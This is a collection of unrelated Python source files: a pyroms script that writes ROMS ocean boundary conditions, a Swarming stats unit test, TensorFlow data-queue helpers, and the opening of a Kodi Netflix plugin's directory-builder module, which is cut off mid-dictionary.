ncu.createVariable('u_south', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_south'].long_name = '3D u-momentum south boundary condition'
ncu.variables['u_south'].units = 'meter second-1'
ncu.variables['u_south'].field = 'u_south, scalar, series'
#ncu.variables['u_south']._FillValue = spval
print 'Creating variable u_east'
ncu.createVariable('u_east', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_east'].long_name = '3D u-momentum east boundary condition'
ncu.variables['u_east'].units = 'meter second-1'
ncu.variables['u_east'].field = 'u_east, scalar, series'
#ncu.variables['u_east']._FillValue = spval
print 'Creating variable u_west'
ncu.createVariable('u_west', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_west'].long_name = '3D u-momentum west boundary condition'
ncu.variables['u_west'].units = 'meter second-1'
ncu.variables['u_west'].field = 'u_west, scalar, series'
#ncu.variables['u_west']._FillValue = spval
# create variable in destination file
print 'Creating variable ubar_north'
ncu.createVariable('ubar_north', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_north'].long_name = '2D u-momentum north boundary condition'
ncu.variables['ubar_north'].units = 'meter second-1'
ncu.variables['ubar_north'].field = 'ubar_north, scalar, series'
#ncu.variables['ubar_north']._FillValue = spval
print 'Creating variable ubar_south'
ncu.createVariable('ubar_south', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_south'].long_name = '2D u-momentum south boundary condition'
ncu.variables['ubar_south'].units = 'meter second-1'
ncu.variables['ubar_south'].field = 'ubar_south, scalar, series'
#ncu.variables['ubar_south']._FillValue = spval
print 'Creating variable ubar_east'
ncu.createVariable('ubar_east', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_east'].long_name = '2D u-momentum east boundary condition'
ncu.variables['ubar_east'].units = 'meter second-1'
ncu.variables['ubar_east'].field = 'ubar_east, scalar, series'
#ncu.variables['ubar_east']._FillValue = spval
print 'Creating variable ubar_west'
ncu.createVariable('ubar_west', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_west'].long_name = '2D u-momentum west boundary condition'
ncu.variables['ubar_west'].units = 'meter second-1'
ncu.variables['ubar_west'].field = 'ubar_west, scalar, series'
#ncu.variables['ubar_west']._FillValue = spval
print 'Creating variable v_north'
ncv.createVariable('v_north', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_north'].long_name = '3D v-momentum north boundary condition'
ncv.variables['v_north'].units = 'meter second-1'
ncv.variables['v_north'].field = 'v_north, scalar, series'
#ncv.variables['v_north']._FillValue = spval
print 'Creating variable v_south'
ncv.createVariable('v_south', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_south'].long_name = '3D v-momentum south boundary condition'
ncv.variables['v_south'].units = 'meter second-1'
ncv.variables['v_south'].field = 'v_south, scalar, series'
#ncv.variables['v_south']._FillValue = spval
print 'Creating variable v_east'
ncv.createVariable('v_east', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_east'].long_name = '3D v-momentum east boundary condition'
ncv.variables['v_east'].units = 'meter second-1'
ncv.variables['v_east'].field = 'v_east, scalar, series'
#ncv.variables['v_east']._FillValue = spval
print 'Creating variable v_west'
ncv.createVariable('v_west', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_west'].long_name = '3D v-momentum west boundary condition'
ncv.variables['v_west'].units = 'meter second-1'
ncv.variables['v_west'].field = 'v_west, scalar, series'
#ncv.variables['v_west']._FillValue = spval
print 'Creating variable vbar_north'
ncv.createVariable('vbar_north', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_north'].long_name = '2D v-momentum north boundary condition'
ncv.variables['vbar_north'].units = 'meter second-1'
ncv.variables['vbar_north'].field = 'vbar_north, scalar, series'
#ncv.variables['vbar_north']._FillValue = spval
print 'Creating variable vbar_south'
ncv.createVariable('vbar_south', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_south'].long_name = '2D v-momentum south boundary condition'
ncv.variables['vbar_south'].units = 'meter second-1'
ncv.variables['vbar_south'].field = 'vbar_south, scalar, series'
#ncv.variables['vbar_south']._FillValue = spval
print 'Creating variable vbar_east'
ncv.createVariable('vbar_east', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_east'].long_name = '2D v-momentum east boundary condition'
ncv.variables['vbar_east'].units = 'meter second-1'
ncv.variables['vbar_east'].field = 'vbar_east, scalar, series'
#ncv.variables['vbar_east']._FillValue = spval
print 'Creating variable vbar_west'
ncv.createVariable('vbar_west', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_west'].long_name = '2D v-momentum west boundary condition'
ncv.variables['vbar_west'].units = 'meter second-1'
ncv.variables['vbar_west'].field = 'vbar_west, scalar, series'
#ncv.variables['vbar_west']._FillValue = spval
# remapping
print 'remapping and rotating u and v from', src_grd.name, \
'to', dst_grd.name
print 'time =', time
# flood the grid
print 'flood the grid'
src_uz = pyroms_toolbox.BGrid_SODA.flood(src_varu, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
src_vz = pyroms_toolbox.BGrid_SODA.flood(src_varv, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
# horizontal interpolation using scrip weights
print 'horizontal interpolation using scrip weights'
dst_uz = pyroms.remapping.remap(src_uz, wts_file, \
spval=spval)
dst_vz = pyroms.remapping.remap(src_vz, wts_file, \
spval=spval)
# vertical interpolation from standard z level to sigma
print 'vertical interpolation from standard z level to sigma'
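# Each boundary keeps only the two outermost rows/columns of the z-level field
# (jrange/irange of width 2), so the expensive vertical interpolation is done only
# along the open boundaries rather than over the full domain.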
dst_u_north = pyroms.remapping.z2roms(dst_uz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_u_south = pyroms.remapping.z2roms(dst_uz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_u_east = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_u_west = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
dst_v_north = pyroms.remapping.z2roms(dst_vz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_v_south = pyroms.remapping.z2roms(dst_vz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_v_east = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_v_west = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
# rotate u,v fields
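# Rotation via complex arithmetic: writing U = u + i*v and multiplying by exp(-i*angle)
# rotates the vector by -angle, so the real part is the grid-aligned u and the imaginary
# part the grid-aligned v. src_angle is taken as zero here (the source fields are assumed
# to be east/north oriented).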
src_angle = np.zeros(dst_grd.hgrid.angle_rho.shape)
dst_angle = dst_grd.hgrid.angle_rho
angle = dst_angle - src_angle
angle = np.tile(angle, (dst_grd.vgrid.N, 1, 1))
U_north = dst_u_north + dst_v_north*1j
eitheta_north = np.exp(-1j*angle[:,Mp-2:Mp, 0:Lp])
U_north = U_north * eitheta_north
dst_u_north = np.real(U_north)
dst_v_north = np.imag(U_north)
U_south = dst_u_south + dst_v_south*1j
eitheta_south = np.exp(-1j*angle[:,0:2, 0:Lp])
U_south = U_south * eitheta_south
dst_u_south = np.real(U_south)
dst_v_south = np.imag(U_south)
U_east = dst_u_east + dst_v_east*1j
eitheta_east = np.exp(-1j*angle[:,0:Mp, Lp-2:Lp])
U_east = U_east * eitheta_east
dst_u_east = np.real(U_east)
dst_v_east = np.imag(U_east)
U_west = dst_u_west + dst_v_west*1j
eitheta_west = np.exp(-1j*angle[:,0:Mp, 0:2])
U_west = U_west * eitheta_west
dst_u_west = np.real(U_west)
dst_v_west = np.imag(U_west)
# move back to u,v points
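# The rotated fields are still at rho points; adjacent rho values are averaged to place
# u on u-points and v on v-points of the staggered (Arakawa C) grid.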
dst_u_north = 0.5 * np.squeeze(dst_u_north[:,-1,:-1] + dst_u_north[:,-1,1:])
dst_v_north = 0.5 * np.squeeze(dst_v_north[:,:-1,:] + dst_v_north[:,1:,:])
dst_u_south = 0.5 * np.squeeze(dst_u_south[:,0,:-1] + dst_u_south[:,0,1:])
dst_v_south = 0.5 * np.squeeze(dst_v_south[:,:-1,:] + dst_v_south[:,1:,:])
dst_u_east = 0.5 * np.squeeze(dst_u_east[:,:,:-1] + dst_u_east[:,:,1:])
dst_v_east = 0.5 * np.squeeze(dst_v_east[:,:-1,-1] + dst_v_east[:,1:,-1])
dst_u_west = 0.5 * np.squeeze(dst_u_west[:,:,:-1] + dst_u_west[:,:,1:])
dst_v_west = 0.5 * np.squeeze(dst_v_west[:,:-1,0] + dst_v_west[:,1:,0])
# spval
idxu_north = np.where(dst_grd.hgrid.mask_u[-1,:] == 0)
idxv_north = np.where(dst_grd.hgrid.mask_v[-1,:] == 0)
idxu_south = np.where(dst_grd.hgrid.mask_u[0,:] == 0)
idxv_south = np.where(dst_grd.hgrid.mask_v[0,:] == 0)
idxu_east = np.where(dst_grd.hgrid.mask_u[:,-1] == 0)
idxv_east = np.where(dst_grd.hgrid.mask_v[:,-1] == 0)
idxu_west = np.where(dst_grd.hgrid.mask_u[:,0] == 0)
idxv_west = np.where(dst_grd.hgrid.mask_v[:,0] == 0)
for n in range(dst_grd.vgrid.N):
dst_u_north[n, idxu_north[0]] = spval
dst_v_north[n, idxv_north[0]] = spval
dst_u_south[n, idxu_south[0]] = spval
dst_v_south[n, idxv_south[0]] = spval
dst_u_east[n, idxu_east[0]] = spval
dst_v_east[n, idxv_east[0]] = spval
dst_u_west[n, idxu_west[0]] = spval
dst_v_west[n, idxv_west[0]] = spval
# compute depth average velocity ubar and vbar
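# ubar/vbar are depth averages: sum over layers of u_k * dz_k divided by the total water
# column depth, with dz_k = diff(z_w) and the depth taken as -z_w at the deepest interface
# (z_w is negative downward, with the surface interface near zero).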
# get z at the right position
z_u_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:-1] + dst_grd.vgrid.z_w[0,:,-1,1:])
z_v_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:] + dst_grd.vgrid.z_w[0,:,-2,:])
z_u_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:-1] + dst_grd.vgrid.z_w[0,:,0,1:])
z_v_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:] + dst_grd.vgrid.z_w[0,:,1,:])
z_u_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:,-1] + dst_grd.vgrid.z_w[0,:,:,-2])
z_v_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,-1] + dst_grd.vgrid.z_w[0,:,1:,-1])
z_u_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:,0] + dst_grd.vgrid.z_w[0,:,:,1])
z_v_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,0] + dst_grd.vgrid.z_w[0,:,1:,0])
dst_ubar_north = np.zeros(dst_u_north.shape[1])
dst_ubar_south = np.zeros(dst_u_south.shape[1])
dst_ubar_east = np.zeros(dst_u_east.shape[1])
dst_ubar_west = np.zeros(dst_u_west.shape[1])
dst_vbar_north = np.zeros(dst_v_north.shape[1])
dst_vbar_south = np.zeros(dst_v_south.shape[1])
dst_vbar_east = np.zeros(dst_v_east.shape[1])
dst_vbar_west = np.zeros(dst_v_west.shape[1])
for i in range(dst_u_north.shape[1]):
dst_ubar_north[i] = (dst_u_north[:,i] * np.diff(z_u_north[:,i])).sum() / -z_u_north[0,i]
dst_ubar_south[i] = (dst_u_south[:,i] * np.diff(z_u_south[:,i])).sum() / -z_u_south[0,i]
for i in range(dst_v_north.shape[1]):
dst_vbar_north[i] = (dst_v_north[:,i] * np.diff(z_v_north[:,i])).sum() / -z_v_north[0,i]
dst_vbar_south[i] = (dst_v_south[:,i] * np.diff(z_v_south[:,i])).sum() / -z_v_south[0,i]
for j in range(dst_u_east.shape[1]):
dst_ubar_east[j] = (dst_u_east[:,j] * np.diff(z_u_east[:,j])).sum() / -z_u_east[0,j]
dst_ubar_west[j] = (dst_u_west[:,j] * np.diff(z_u_west[:,j])).sum() / -z_u_west[0,j]
for j in range(dst_v_east.shape[1]):
dst_vbar_east[j] = (dst_v_east[:,j] * np.diff(z_v_east[:,j])).sum() / -z_v_east[0,j]
dst_vbar_west[j] = (dst_v_west[:,j] * np.diff(z_v_west[:,j])).sum() / -z_v_west[0,j]
#mask
dst_ubar_north = np.ma.masked_where(dst_grd.hgrid.mask_u[-1,:] == 0, dst_ubar_north)
dst_ubar_south = np.ma.masked_where(dst_grd.hgrid.mask_u[0,:] == 0, dst_ubar_south)
dst_ubar_east = np.ma.masked_where(dst_grd.hgrid.mask_u[:,-1] == 0, dst_ubar_east)
dst_ubar_west = np.ma.masked_where(dst_grd.hgrid.mask_u[:,0] == 0, dst_ubar_west)
dst_vbar_north = np.ma.masked_where(dst_grd.hgrid.mask_v[-1,:] == 0, dst_vbar_north)
dst_vbar_south = np.ma.masked_where(dst_grd.hgrid.mask_v[0,:] == 0, dst_vbar_south)
dst_vbar_east = np.ma.masked_where(dst_grd.hgrid.mask_v[:,-1] == 0, dst_vbar_east)
dst_vbar_west = np.ma.masked_where(dst_grd.hgrid.mask_v[:,0] == 0, dst_vbar_west)
# write data in destination file
print 'write data in destination file'
ncu.variables['ocean_time'][0] = time
ncu.variables['u_north'][0] = dst_u_north
ncu.variables['u_south'][0] = dst_u_south
ncu.variables['u_east'][0] = dst_u_east
ncu.variables['u_west'][0] = dst_u_west
ncu.variables['ubar_north'][0] = dst_ubar_north
ncu.variables['ubar_south'][0] = dst_ubar_south
ncu.variables['ubar_east'][0] = dst_ubar_east
ncu.variables['ubar_west'][0] = dst_ubar_west
ncv.variables['ocean_time'][0] = time
ncv.variables['v_north'][0] = dst_v_north
ncv.variables['v_south'][0] = dst_v_south
ncv.variables['v_east'][0] = dst_v_east
ncv.variables['v_west'][0] = dst_v_west
ncv.variables['vbar_north'][0] = dst_vbar_north
ncv.variables['vbar_south'][0] = dst_vbar_south
ncv.variables['vbar_east'][0] = dst_vbar_east
ncv.variables['vbar_west'][0] = dst_vbar_west
# print dst_u.shape
# print dst_ubar.shape
# print dst_v.shape
# print dst_vbar.shape
# close file
ncu.close()
ncv.close()
cdf.close()
|
|
#!/usr/bin/env python
# Copyright 2014 The Swarming Authors. All rights reserved.
# Use of this source code is governed by the Apache v2.0 license that can be
# found in the LICENSE file.
import logging
import os
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import test_env
test_env.setup_test_env()
from server import stats
from support import test_case
# pylint: disable=W0212
class StatsPrivateTest(test_case.TestCase):
def _gen_data(self):
dimensions = {'os': 'Amiga', 'hostname': 'host3'}
# Description of the log entries:
# - host3 is idle
# - 100 was enqueued
# - 101 was started by host2
# - 101 was completed by host2
# - 201 had bot host1 die on it
# - 300 expired
# - 402 is running on host4
data = (
stats._pack_entry(action='bot_active', bot_id='host3', dimensions={}),
stats._pack_entry(action='bot_inactive', bot_id='failed1', dimensions={}),
stats._pack_entry(
action='task_enqueued', task_id='100', dimensions={}, user='me'),
stats._pack_entry(
action='run_started', run_id='101', bot_id='host2',
dimensions={}, pending_ms=1500, user='me'),
stats._pack_entry(
action='run_completed', run_id='101', bot_id='host2',
dimensions={}, runtime_ms=6000, user='me'),
stats._pack_entry(
action='task_completed', task_id='100',
dimensions={}, pending_ms=6000, user='me'),
stats._pack_entry(
action='run_bot_died', run_id='201', bot_id='host1',
dimensions=dimensions, user='joe'),
stats._pack_entry(
action='task_request_expired', task_id='300', dimensions={},
user='you'),
stats._pack_entry(
action='run_updated', run_id='402', bot_id='host4',
dimensions={}),
)
actions_tested = sorted(stats._unpack_entry(i)['action'] for i in data)
self.assertEqual(sorted(map(unicode, stats._VALID_ACTIONS)), actions_tested)
snapshot = stats._Snapshot()
bots_active = {}
bots_inactive = {}
tasks_active = {}
for line in data:
actual = stats._parse_line(
line, snapshot, bots_active, bots_inactive, tasks_active)
self.assertIs(True, actual, line)
stats._post_process(snapshot, bots_active, bots_inactive, tasks_active)
return snapshot
def test_parse_summary(self):
snapshot = self._gen_data()
expected = {
'bots_active': 3,
'bots_inactive': 1,
'http_failures': 0,
'http_requests': 0,
'tasks_active': 2,
'tasks_avg_pending_secs': 1.5,
'tasks_avg_runtime_secs': 6.0,
'tasks_bot_died': 1,
'tasks_completed': 1,
'tasks_enqueued': 1,
'tasks_pending_secs': 1.5,
'tasks_request_expired': 1,
'tasks_total_runtime_secs': 6.0,
'tasks_started': 1,
}
self.assertEqual(expected, snapshot.to_dict())
self.assertEqual(['host2', 'host3', 'host4'], snapshot.bot_ids)
def test_parse_dimensions(self):
snapshot = self._gen_data()
expected = [
{
'bots_active': 0,
'bots_inactive': 0,
'dimensions': '{"os":"Amiga"}',
'tasks_active': 0,
'tasks_avg_pending_secs': 0.0,
'tasks_avg_runtime_secs': 0.0,
'tasks_bot_died': 1,
'tasks_completed': 0,
'tasks_enqueued': 0,
'tasks_pending_secs': 0,
'tasks_request_expired': 0,
'tasks_total_runtime_secs': 0,
'tasks_started': 0,
},
{
'bots_active': 3,
'bots_inactive': 1,
'dimensions': '{}',
'tasks_active': 2,
'tasks_avg_pending_secs': 1.5,
'tasks_avg_runtime_secs': 6.0,
'tasks_bot_died': 0,
'tasks_completed': 1,
'tasks_enqueued': 1,
'tasks_pending_secs': 1.5,
'tasks_request_expired': 1,
'tasks_total_runtime_secs': 6.0,
'tasks_started': 1,
},
]
self.assertEqual(expected, [i.to_dict() for i in snapshot.buckets])
expected = [
[],
[u'host2', u'host3', u'host4'],
]
self.assertEqual(expected, [i.bot_ids for i in snapshot.buckets])
def test_parse_user(self):
snapshot = self._gen_data()
expected = [
{
'tasks_active': 0,
'tasks_avg_pending_secs': 0.0,
'tasks_avg_runtime_secs': 0.0,
'tasks_bot_died': 1,
'tasks_completed': 0,
'tasks_enqueued': 0,
'tasks_pending_secs': 0,
'tasks_request_expired': 0,
'tasks_total_runtime_secs': 0,
'tasks_started': 0,
'user': u'joe',
},
{
'tasks_active': 0,
'tasks_avg_pending_secs': 1.5,
'tasks_avg_runtime_secs': 6.0,
'tasks_bot_died': 0,
'tasks_completed': 1,
'tasks_enqueued': 1,
'tasks_pending_secs': 1.5,
'tasks_request_expired': 0,
'tasks_total_runtime_secs': 6.0,
'tasks_started': 1,
'user': u'me',
},
{
'tasks_active': 0,
'tasks_avg_pending_secs': 0.0,
'tasks_avg_runtime_secs': 0.0,
'tasks_bot_died': 0,
'tasks_completed': 0,
'tasks_enqueued': 0,
'tasks_pending_secs': 0,
'tasks_request_expired': 1,
'tasks_total_runtime_secs': 0,
'tasks_started': 0,
'user': u'you',
},
]
self.assertEqual(expected, [i.to_dict() for i in snapshot.users])
def test_parse_task_active(self):
# It is important to note that it is the request properties that are logged,
# not the bot properties.
data = (
stats._pack_entry(
action='run_updated', run_id='201', bot_id='host1',
dimensions={'os': 'Linux'}),
stats._pack_entry(
action='run_updated', run_id='201', bot_id='host1',
dimensions={'os': 'Linux'}),
stats._pack_entry(
action='run_updated', run_id='301', bot_id='host2',
dimensions={'os': 'Windows'}),
stats._pack_entry(
action='bot_active', bot_id='host3',
dimensions={'os': ['Windows', 'Windows-3.1']}),
stats._pack_entry(
action='bot_active', bot_id='host4',
dimensions={'os': ['Linux', 'Linux-12.04']}),
)
snapshot = stats._Snapshot()
bots_active = {}
bots_inactive = {}
tasks_active = {}
for line in data:
actual = stats._parse_line(
line, snapshot, bots_active, bots_inactive, tasks_active)
self.assertEqual(True, actual)
stats._post_process(snapshot, bots_active, bots_inactive, tasks_active)
expected = [
'{"os":"Linux"}',
'{"os":"Windows"}',
]
self.assertEqual(expected, [i.dimensions for i in snapshot.buckets])
self.assertEqual(0, len(snapshot.users))
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.ERROR)
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper functions for enqueuing data from arrays and pandas `DataFrame`s."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from tensorflow.contrib.learn.python.learn.dataframe.queues import feeding_queue_runner as fqr
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import queue_runner
# pylint: disable=g-import-not-at-top
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
class _ArrayFeedFn(object):
"""Creates feed dictionaries from numpy arrays."""
def __init__(self,
placeholders,
array,
batch_size,
random_start=False,
seed=None):
if len(placeholders) != 2:
raise ValueError("_array_feed_fn expects 2 placeholders; got {}.".format(
len(placeholders)))
self._placeholders = placeholders
self._array = array
self._max = len(array)
self._batch_size = batch_size
random.seed(seed)
self._trav = random.randrange(self._max) if random_start else 0
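# __call__ builds one feed_dict per invocation: batch_size consecutive row indexes
# starting at the current traversal position, wrapped with a modulo so the array is
# cycled indefinitely.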
def __call__(self):
integer_indexes = [j % self._max
for j in range(self._trav, self._trav + self._batch_size)
]
self._trav = (integer_indexes[-1] + 1) % self._max
return {self._placeholders[0]: integer_indexes,
self._placeholders[1]: self._array[integer_indexes]}
class _PandasFeedFn(object):
"""Creates feed dictionaries from pandas `DataFrames`."""
def __init__(self,
placeholders,
dataframe,
batch_size,
random_start=False,
seed=None):
if len(placeholders) != len(dataframe.columns) + 1:
raise ValueError("Expected {} placeholders; got {}.".format(
len(dataframe.columns), len(placeholders)))
self._index_placeholder = placeholders[0]
self._col_placeholders = placeholders[1:]
self._dataframe = dataframe
self._max = len(dataframe)
self._batch_size = batch_size
random.seed(seed)
self._trav = random.randrange(self._max) if random_start else 0
def __call__(self):
integer_indexes = [j % self._max
for j in range(self._trav, self._trav + self._batch_size)
]
self._trav = (integer_indexes[-1] + 1) % self._max
result = self._dataframe.iloc[integer_indexes]
cols = [result[col].values for col in result.columns]
feed_dict = dict(zip(self._col_placeholders, cols))
feed_dict[self._index_placeholder] = result.index.values
return feed_dict
def enqueue_data(data,
capacity,
shuffle=False,
min_after_dequeue=None,
num_threads=1,
seed=None,
name="enqueue_input",
enqueue_size=1):
"""Creates a queue filled from a numpy array or pandas `DataFrame`.
Returns a queue filled with the rows of the given array or `DataFrame`. In
the case of a pandas `DataFrame`, the first enqueued `Tensor` corresponds to
the index of the `DataFrame`. For numpy arrays, the first enqueued `Tensor`
contains the row number.
Args:
data: a numpy `ndarray` or pandas `DataFrame` that will be read into the
queue.
capacity: the capacity of the queue.
shuffle: whether or not to shuffle the rows of the array.
min_after_dequeue: minimum number of elements that can remain in the queue
after a dequeue operation. Only used when `shuffle` is true. If not set,
defaults to `capacity` / 4.
num_threads: number of threads used for reading and enqueueing.
seed: used to seed shuffling and reader starting points.
name: a scope name identifying the data.
enqueue_size: the number of rows to enqueue per step.
Returns:
A queue filled with the rows of the given array or `DataFrame`.
Raises:
TypeError: `data` is not a Pandas `DataFrame` or a numpy `ndarray`.
"""
with ops.name_scope(name):
if isinstance(data, np.ndarray):
types = [dtypes.int64, dtypes.as_dtype(data.dtype)]
queue_shapes = [(), data.shape[1:]]
get_feed_fn = _ArrayFeedFn
elif HAS_PANDAS and isinstance(data, pd.DataFrame):
types = [dtypes.as_dtype(dt)
for dt in [data.index.dtype] + list(data.dtypes)]
queue_shapes = [() for _ in types]
get_feed_fn = _PandasFeedFn
else:
raise TypeError(
"data must be either a numpy array or pandas DataFrame if pandas is "
"installed; got {}".format(type(data).__name__))
if shuffle:
min_after_dequeue = int(capacity / 4 if min_after_dequeue is None else
min_after_dequeue)
queue = data_flow_ops.RandomShuffleQueue(capacity,
min_after_dequeue,
dtypes=types,
shapes=queue_shapes,
seed=seed)
else:
if num_threads > 1:
# TODO(jamieas): Add TensorBoard warning here once available.
logging.warning(
"enqueue_data was called with shuffle=False and num_threads > 1. "
"This will create multiple threads, all reading the "
"array/dataframe in order. If you want examples read in order, use"
" one thread; if you want multiple threads, enable shuffling.")
min_after_dequeue = 0 # just for the summary text
queue = data_flow_ops.FIFOQueue(capacity,
dtypes=types,
shapes=queue_shapes)
enqueue_ops = []
feed_fns = []
for i in range(num_threads):
# Note the placeholders have no shapes, so they will accept any
# enqueue_size. enqueue_many below will break them up.
placeholders = [array_ops.placeholder(t) for t in types]
enqueue_ops.append(queue.enqueue_many(placeholders))
seed_i = None if seed is None else (i + 1) * seed
feed_fns.append(get_feed_fn(placeholders,
data,
enqueue_size,
random_start=shuffle,
seed=seed_i))
runner = fqr.FeedingQueueRunner(queue=queue,
enqueue_ops=enqueue_ops,
feed_fns=feed_fns)
queue_runner.add_queue_runner(runner)
full = (math_ops.cast(
math_ops.maximum(0, queue.size() - min_after_dequeue),
dtypes.float32) * (1. / (capacity - min_after_dequeue)))
# Note that name contains a '/' at the end so we intentionally do not place
# a '/' after %s below.
summary_name = ("queue/%sfraction_over_%d_of_%d_full" %
(queue.name, min_after_dequeue,
capacity - min_after_dequeue))
logging_ops.scalar_summary(summary_name, full)
return queue
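# A minimal usage sketch (not part of the original module, values are hypothetical):
# the returned queue is consumed with dequeue_many, and the feeding queue runners must
# be started before evaluating the dequeued tensors.
#
#   data = np.arange(32).reshape(16, 2)
#   queue = enqueue_data(data, capacity=64, shuffle=True, seed=0)
#   index_batch, row_batch = queue.dequeue_many(4)
#   # index_batch holds the row numbers, row_batch the corresponding rows;
#   # start the runners with tf.train.start_queue_runners(sess) before sess.run.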
|
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 Sebastian Golasch (plugin.video.netflix)
Copyright (C) 2020 Stefano Gottardo (original implementation module)
Generate the data to build a directory of xbmcgui ListItem's
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
from __future__ import absolute_import, division, unicode_literals
from future.utils import iteritems
import resources.lib.common as common
from resources.lib.database.db_utils import (TABLE_MENU_DATA)
from resources.lib.globals import G
from resources.lib.kodi.context_menu import generate_context_menu_items, generate_context_menu_profile
from resources.lib.kodi.infolabels import get_color_name, add_info_dict_item, set_watched_status
from resources.lib.services.nfsession.directorybuilder.dir_builder_utils import (get_param_watched_status_by_profile,
add_items_previous_next_page,
get_availability_message)
from resources.lib.utils.logging import measure_exec_time_decorator
try: # Python 2
unicode
except NameError: # Python 3
unicode = str # pylint: disable=redefined-builtin
# This module converts a DataType object such as VideoListSorted (which contains a list of videos, items, etc.)
# into a list of dicts closely resembling xbmcgui.ListItem; the client frontend converts them into real
# ListItem's (because the xbmcgui.ListItem object is currently not serializable).
# The dict keys are managed by the '_convert_list' method of listings.py.
# All build methods should return the same tuple structure: ('directory items', 'extra data dict').
# The common_data dict avoids repeated expensive lookups of shared resources across consecutive accesses
# and speeds up execution considerably.
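# For illustration only (hypothetical values): a typical directory item produced by the
# build methods below looks roughly like
#   {'label': 'My list', 'url': '<plugin url>', 'is_folder': True,
#    'art': {'icon': '...'}, 'info': {'plot': '...'},
#    'menu_items': [...], 'properties': {...}}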
@measure_exec_time_decorator(is_immediate=True)
def build_mainmenu_listing(loco_list):
"""Builds the main menu listing (my list, continue watching, etc.)"""
from resources.lib.kodi.context_menu import generate_context_menu_mainmenu
directory_items = []
common_data = {
'profile_language_code': G.LOCAL_DB.get_profile_config('language', ''),
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color'))
}
for menu_id, data in iteritems(G.MAIN_MENU_ITEMS):
if data.get('has_show_setting', True) and not G.ADDON.getSettingBool('_'.join(('show_menu', menu_id))):
continue
if data['loco_known']:
list_id, video_list = loco_list.find_by_context(data['loco_contexts'][0])
if not list_id:
continue
menu_title = video_list['displayName']
dict_item = _create_videolist_item(list_id, video_list, data, common_data, static_lists=True)
else:
menu_title = common.get_local_string(data['label_id']) if data.get('label_id') else 'Missing menu title'
menu_description = (common.get_local_string(data['description_id'])
if data['description_id'] is not None
else '')
dict_item = {
'url': common.build_url(data['path'], mode=G.MODE_DIRECTORY),
'label': menu_title,
'art': {'icon': data['icon']},
